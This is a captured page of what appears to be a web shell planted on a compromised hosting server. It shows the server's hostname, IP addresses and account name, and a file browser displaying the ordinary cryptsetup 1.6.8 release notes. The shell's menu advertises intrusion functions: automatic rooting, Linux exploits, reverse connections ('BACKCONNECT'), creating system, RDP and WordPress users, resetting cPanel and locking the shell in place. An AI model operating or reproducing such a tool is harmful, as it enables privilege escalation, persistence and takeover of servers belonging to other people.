Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 3.146.255.161
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
cryptsetup-2.0.3 /
[ HOME SHELL ]
Name
Size
Permission
Action
AUTHORS
102
B
-rw-r--r--
FAQ
118.35
KB
-rw-r--r--
v1.0.7-ReleaseNotes
2.85
KB
-rw-r--r--
v1.1.0-ReleaseNotes
4.92
KB
-rw-r--r--
v1.1.1-ReleaseNotes
1.75
KB
-rw-r--r--
v1.1.2-ReleaseNotes
1.56
KB
-rw-r--r--
v1.1.3-ReleaseNotes
482
B
-rw-r--r--
v1.2.0-ReleaseNotes
4.74
KB
-rw-r--r--
v1.3.0-ReleaseNotes
4.64
KB
-rw-r--r--
v1.3.1-ReleaseNotes
421
B
-rw-r--r--
v1.4.0-ReleaseNotes
5.19
KB
-rw-r--r--
v1.4.1-ReleaseNotes
889
B
-rw-r--r--
v1.4.2-ReleaseNotes
1.59
KB
-rw-r--r--
v1.4.3-ReleaseNotes
2.3
KB
-rw-r--r--
v1.5.0-ReleaseNotes
8.41
KB
-rw-r--r--
v1.5.1-ReleaseNotes
1.26
KB
-rw-r--r--
v1.6.0-ReleaseNotes
9.31
KB
-rw-r--r--
v1.6.1-ReleaseNotes
1.02
KB
-rw-r--r--
v1.6.2-ReleaseNotes
985
B
-rw-r--r--
v1.6.3-ReleaseNotes
1.82
KB
-rw-r--r--
v1.6.4-ReleaseNotes
1.99
KB
-rw-r--r--
v1.6.5-ReleaseNotes
2.42
KB
-rw-r--r--
v1.6.6-ReleaseNotes
1.07
KB
-rw-r--r--
v1.6.7-ReleaseNotes
3.25
KB
-rw-r--r--
v1.6.8-ReleaseNotes
2.01
KB
-rw-r--r--
v1.7.0-ReleaseNotes
3.03
KB
-rw-r--r--
v1.7.1-ReleaseNotes
1.34
KB
-rw-r--r--
v1.7.2-ReleaseNotes
1.45
KB
-rw-r--r--
v1.7.3-ReleaseNotes
811
B
-rw-r--r--
v1.7.4-ReleaseNotes
657
B
-rw-r--r--
v1.7.5-ReleaseNotes
833
B
-rw-r--r--
v2.0.0-ReleaseNotes
26
KB
-rw-r--r--
v2.0.1-ReleaseNotes
4.75
KB
-rw-r--r--
v2.0.2-ReleaseNotes
4.07
KB
-rw-r--r--
v2.0.3-ReleaseNotes
5.21
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : v1.6.8-ReleaseNotes
Cryptsetup 1.6.8 Release Notes ============================== Changes since version 1.6.7 * If the null cipher (no encryption) is used, allow only empty password for LUKS. (Previously cryptsetup accepted any password in this case.) The null cipher can be used only for testing and it is used temporarily during offline encrypting not yet encrypted device (cryptsetup-reencrypt tool). Accepting only empty password prevents situation when someone adds another LUKS device using the same UUID (UUID of existing LUKS device) with faked header containing null cipher. This could force user to use different LUKS device (with no encryption) without noticing. (IOW it prevents situation when attacker intentionally forces user to boot into different system just by LUKS header manipulation.) Properly configured systems should have an additional integrity protection in place here (LUKS here provides only confidentiality) but it is better to not allow this situation in the first place. (For more info see QubesOS Security Bulletin QSB-019-2015.) * Properly support stdin "-" handling for luksAddKey for both new and old keyfile parameters. * If encrypted device is file-backed (it uses underlying loop device), cryptsetup resize will try to resize underlying loop device as well. (It can be used to grow up file-backed device in one step.) * Cryptsetup now allows to use empty password through stdin pipe. (Intended only for testing in scripts.) Cryptsetup API NOTE: Direct terminal handling and password calling callback for passphrase entry will be removed from libcryptsetup in next major (2.x) version (application should handle it itself). It means that application have to always provide password in API calls. Functions returning last error will be removed in next major version (2.x). These functions did not work properly for early initialization errors and application can implement better function easily using own error callback. See comments in libcryptsetup.h for more info about deprecated functions.
Close